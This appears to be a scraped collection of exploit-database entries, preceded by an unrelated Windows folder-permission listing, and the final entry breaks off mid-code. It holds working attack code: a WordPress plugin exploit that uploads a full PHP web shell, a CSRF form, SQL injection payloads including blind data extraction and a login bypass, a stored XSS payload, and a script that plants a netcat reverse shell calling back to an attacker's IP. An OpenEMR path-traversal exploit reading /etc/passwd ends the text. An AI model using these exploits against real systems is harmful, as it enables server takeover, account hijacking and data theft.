Everyone:(OI)(CI)(ID)C NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Administrators:(OI)(CI)(IO)(ID)F BUILTIN\Users:(ID)R BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:) GENERIC_READ GENERIC_EXECUTE CREATOR OWNER:(OI)(CI)(IO)(ID)F AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(OI)(CI)(IO)(ID)(accesso speciale:) GENERIC_READ GENERIC_EXECUTE AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(OI)(CI)(IO)(ID)(accesso speciale:) GENERIC_READ GENERIC_EXECUTE

# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated) # Date 01.07.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://webnus.net/modern-events-calendar/ # Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip # Version: Before 5.16.5 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24145 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md ''' Description: Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request. ''' ''' Banner: ''' banner = """ ______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | || || ___| | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \ | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) | \____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_| |_||____/ * Wordpress Plugin Modern Events Calendar Lite RCE * @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header = auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit() ''' Exploit: ''' exploit_url = "http://" + target_ip + ':' + target_port + wp_path + "wp-admin/admin.php?page=MEC-ix&tab=MEC-import" # Exploit Header: header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------29650037893637916779865254589", "Origin": "http://" + target_ip, "Connection": "close", "Upgrade-Insecure-Requests": "1" } # Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell body = "-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"feed\"; filename=\"shell.php\"\r\nContent-Type: text/csv\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"mec-ix-action\"\r\n\r\nimport-start-bookings\r\n-----------------------------29650037893637916779865254589--\r\n" # Exploit session.post(exploit_url, headers=header, data=body) print('') print('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php') print('')

# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) # Exploit Author: Alperen Ergel (@alpernae) # Vendor Homepage: https://b2evolution.net/ # Software Link: https://b2evolution.net/downloads/7-2-2 # Version : 7.2.2 # Tested on: Kali Linux # Category: WebApp ######## Description ######## Allows to attacker change admin account details. ######## Proof of Concept ######## ===> REQUEST <==== POST /b2evolution/evoadm.php HTTP/1.1 Host: s2.demo.opensourcecms.com Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt; __cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK- zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA; _ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1031 Origin: https://s2.demo.opensourcecms.com Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile Upgrade-Insecure-Requests: 1 Te: trailers Connection: close ## < SNIPP > edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID= &edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D= &uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7= http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1 #### Proof-Of-Concept #### <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST"> <input type="hidden" name="edited&#95;user&#95;login" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;firstname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;lastname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;nickname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;gender" value="M" /> <input type="hidden" name="edited&#95;user&#95;ctry&#95;ID" value="233" /> <input type="hidden" name="edited&#95;user&#95;rgn&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;subrg&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;city&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;age&#95;min" value="" /> <input type="hidden" name="edited&#95;user&#95;age&#95;max" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;month" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;day" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;year" value="" /> <input type="hidden" name="organizations&#91;&#93;" value="1" /> <input type="hidden" name="org&#95;roles&#91;&#93;" value="King&#32;of&#32;Spades" /> <input type="hidden" name="org&#95;priorities&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;1" value="I&#32;am&#32;the&#32;demo&#32;administrator&#32;of&#32;this&#32;site&#46;&#13;&#10;I&#32;love&#32;having&#32;so&#32;much&#32;power&#33;" /> <input type="hidden" name="uf&#95;new&#91;2&#93;&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;new&#91;3&#93;&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;2" value="https&#58;&#47;&#47;twitter&#46;com&#47;b2evolution&#47;" /> <input type="hidden" name="uf&#95;3" value="https&#58;&#47;&#47;www&#46;facebook&#46;com&#47;b2evolution" /> <input type="hidden" name="uf&#95;4" value="https&#58;&#47;&#47;plus&#46;google&#46;com&#47;&#43;b2evolution&#47;posts" /> <input type="hidden" name="uf&#95;5" value="https&#58;&#47;&#47;www&#46;linkedin&#46;com&#47;company&#47;b2evolution&#45;net" /> <input type="hidden" name="uf&#95;6" value="https&#58;&#47;&#47;github&#46;com&#47;b2evolution&#47;b2evolution" /> <input type="hidden" name="uf&#95;7" value="http&#58;&#47;&#47;b2evolution&#46;net&#47;" /> <input type="hidden" name="new&#95;field&#95;type" value="0" /> <input type="hidden" name="actionArray&#91;update&#93;" value="Save&#32;Changes&#33;" /> <input type="hidden" name="crumb&#95;user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" /> <input type="hidden" name="ctrl" value="user" /> <input type="hidden" name="user&#95;tab" value="profile" /> <input type="hidden" name="identity&#95;form" value="1" /> <input type="hidden" name="user&#95;ID" value="1" /> <input type="hidden" name="orig&#95;user&#95;ID" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated) # Exploit Author: ircashem # Date 02.07.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /login.php HTTP/1.1 Content-Length: 456 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075 Origin: http://localhost DNT: 1 Referer: http://localhost/ Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im Upgrade-Insecure-Requests: 1 Sec-GPC: 1 Connection: close -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="username" admin -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="password" admin' AND (SELECT 1 from (select sleep(5))a) -- - -----------------------------238993435340593308934076060075 Content-Disposition: form-data; name="submit" -----------------------------238993435340593308934076060075-- ########### # Payload # ########### username=admin password=admin' AND (SELECT 1 from (select sleep(5))a) -- -

# Exploit Title: WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS) # Date: July 2, 2021 # Exploit Author: Mohammed Adam # Vendor Homepage: https://wplearnmanager.com/ # Software Link: https://wordpress.org/plugins/learn-manager/ # Version: 1.1.2 # References link: https://wpscan.com/vulnerability/e0182508-23f4-4bdb-a1ef-1d1be38f3ad1 *Description:* The plugin does not properly sanitise or validate its User Field Titles, allowing XSS payload to be used in them. Furthermore, no CSRF and capability checks were in place, allowing such attack to be performed either via CSRF or as any user (including unauthenticated) *Proof of Concept:* POST /wp-admin/admin.php?page=jslm_fieldordering&task=saveuserfield HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 207 Connection: close Upgrade-Insecure-Requests: 1 fieldtitle=Image%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&published=1&isvisitorpublished=1&required=0&search_user=1&search_visitor=1&form_request=jslearnmanager&id=28&isuserfield=0&fieldfor=3&save=Save Then visit /wp-admin/admin.php?page=jslm_fieldordering&ff=3 as admin to trigger the XSS. It may also be triggered elsewhere

# Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE) # Exploit Author: Geiseric # Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075 # Date 02.07.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 import requests import os import sys from requests_toolbelt.multipart.encoder import MultipartEncoder import string import random if len(sys.argv) < 4: print('[+] Usage: python3 ovsploit.py http://<ip> <your ip> <your port>') exit() url = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] exp_url = '/Online_voting_system/admin/save_candidate.php' login_url = '/Online_voting_system/admin/' def first_get(): r = requests.get(url+login_url) return r.headers['Set-Cookie'] def retrieve_first_admin(): print("[!] Stage 1: Finding a valid admin user through SQL Injection") cookie = first_get() count = 0 i=1 flag = True admin = '' while flag: for j in range(32,128): r = requests.post(url+login_url,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie}) if (r.elapsed.total_seconds() > 1): admin += chr(j) i+=1 sys.stdout.write("\rAdmin User: "+ admin) sys.stdout.flush() count=0 else: if count == 100: flag = False break else: count += 1 print("\n[+] First admin user found!") print("[!] Starting Stage 2") return admin def id_generator(size=6, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size))+'.php' def login_bypass(cookie): username = retrieve_first_admin() print("[!] Stage 2 started: Bypassing Login...") r = requests.post(url+login_url,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie}) return cookie def rev_write(): name = id_generator() f = open(name,'w') f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>') f.close() print('[+] Generated file with reverse shell: ' +name) return name def exploit(cookie): print("[+] Uploading reverse shell...") filename=rev_write() multipart_data = MultipartEncoder( { # a file upload field 'image': (filename, open(filename, 'rb'), 'application/x-php'), # plain text fields 'user_name': 'admin', 'rfirstname': 'test', 'rlastname': 'test', 'rgender': 'Male', 'ryear': '1st year', 'rmname': 'test', 'rposition': 'Governor', 'party': 'test', 'save': 'save' } ) r = requests.post(url+exp_url, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie}) return filename filename = exploit(login_bypass(first_get())) print("[!] Triggering...") input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.') os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s') print("[+] Cleaning up!") os.system("rm "+ filename)

# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2) # Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) # Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530 # Date: 2021-06-24 # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz # Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml # Version: < 5.0.2 (it means up to 5.0.1.7) # Tested on: OpenEMR Version 5.0.1 # References: https://www.exploit-db.com/exploits/50037 # CVE: CVE-2019-14530 # CWE: CWE-22 # Patch: https://github.com/openemr/openemr/pull/2592/files #!/usr/bin/env ruby require 'pathname' require 'httpx' require 'docopt' doc = <<~DOCOPT OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure Source: https://github.com/sec-it/exploit-CVE-2019-14530 Usage: #{__FILE__} exploit <url> <filename> <username> <password> [--debug] #{__FILE__} -h | --help Options: <url> Root URL (base path) including HTTP scheme, port and root folder <filename> Filename of the file to be read <username> Username of the admin <password> Password of the admin --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass #{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass DOCOPT def login(root_url, user, pass, http) vuln_url = 